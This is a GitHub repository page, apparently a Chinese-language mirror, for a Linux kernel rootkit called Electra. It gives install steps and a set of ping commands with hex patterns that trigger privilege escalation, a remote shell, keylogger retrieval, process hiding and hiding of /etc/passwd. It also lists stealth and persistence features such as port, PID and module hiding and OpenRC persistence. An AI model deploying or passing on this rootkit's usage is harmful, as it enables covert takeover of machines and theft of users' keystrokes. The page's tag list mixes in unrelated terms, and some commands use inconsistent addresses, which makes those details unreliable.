MikeHorn-git/Electra

GitHub: MikeHorn-git/Electra

基于 kprobe 的 Linux 内核级 rootkit，通过 ICMP 隐蔽通道实现权限提升、进程隐藏和远程控制等后渗透功能。

Stars: 0 | Forks: 0

# Electra ![pleiades](https://upload.wikimedia.org/wikipedia/commons/thumb/6/6b/Elihu_Vedder_-_The_Pleiades%2C_1885.jpg/1280px-Elihu_Vedder_-_The_Pleiades%2C_1885.jpg) ## 目录 - [安装](https://github.com/MikeHorn-git/Electra#installation) - [使用说明](https://github.com/MikeHorn-git/Electra#usage) - [功能](https://github.com/MikeHorn-git/Electra#features) - [作者](https://github.com/MikeHorn-git/Electra#authors) ## 安装 ``` git clone https://github.com/MikeHorn-git/Electra.git cd Electra/ make ``` ## 使用说明 `ping -p

 -c 1 8.8.8.8`

### 提升进程权限

`ping -p ca550100000000000000000000000000 -c 1 8.8.8.8`

### 启动远程 shell

`ping -p ff -c 1 8.8.8.8`

### 获取键盘记录器记录

`ping -p ba -c 1 8.8.8.8`

### 隐藏进程

`ping -p de550100000000000000000000000000 -c 1 8.8.8.8`

### 隐藏 passwd 文件

`ping -p ad017061737377640000000000000000 -c 1 8.8.8.8`

### 恢复

`ping -p ad007061737377640000000000000000 -c 1 8.8.8.8`

### 无法打开 /etc/passwd

`ping -p fe012f6574632f706173737764000000 -c 1 18.8.8.8`

### 恢复

`ping -p fe002f6574632f706173737764000000 -c 1 18.8.8.8`

## 功能

- ICMP 通信
- 键盘记录器
- 文件隐藏
- PID 隐藏
- 端口隐藏
- LKM 隐藏
- Openrc 持久化

## 作者

- [p2lu](https://github.com/p2lu)
- [exhyl](https://github.com/hnopew)
- [MikeHorn-git](https://github.com/MikeHorn-git)

标签：CSV导出, HTTP工具, ICMP, ICMP隐蔽隧道, Keylogger, Kprobe, LKM, OpenRC, Rootkit, Zeek, 内核态, 内核模块隐藏, 协议分析, 反向Shell, 可加载内核模块, 后门, 子域名枚举, 客户端加密, 恶意软件, 提权, 数据展示, 文件隐藏, 权限提升, 端口隐藏, 系统安全, 红队, 网络可见性, 网络安全, 进程隐藏, 远程Shell, 键盘记录器, 隐私保护, 隐藏进程